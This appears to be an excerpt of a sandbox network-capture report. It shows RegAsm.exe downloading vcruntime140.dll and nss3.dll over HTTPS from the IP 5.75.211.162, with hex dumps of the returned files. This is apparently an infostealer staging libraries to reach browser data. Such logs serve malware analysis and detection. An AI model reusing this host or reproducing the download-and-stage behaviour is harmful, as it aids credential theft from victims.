2024-09-26 23:37:57 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 23:37:57 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49725	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:58 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:58 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:58 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:58 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:37:58 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 23:37:58 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-26 23:37:58 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-26 23:37:58 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-26 23:37:58 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49726	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:59 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:59 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:59 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:59 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:37:59 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 23:37:59 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 23:38:00 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
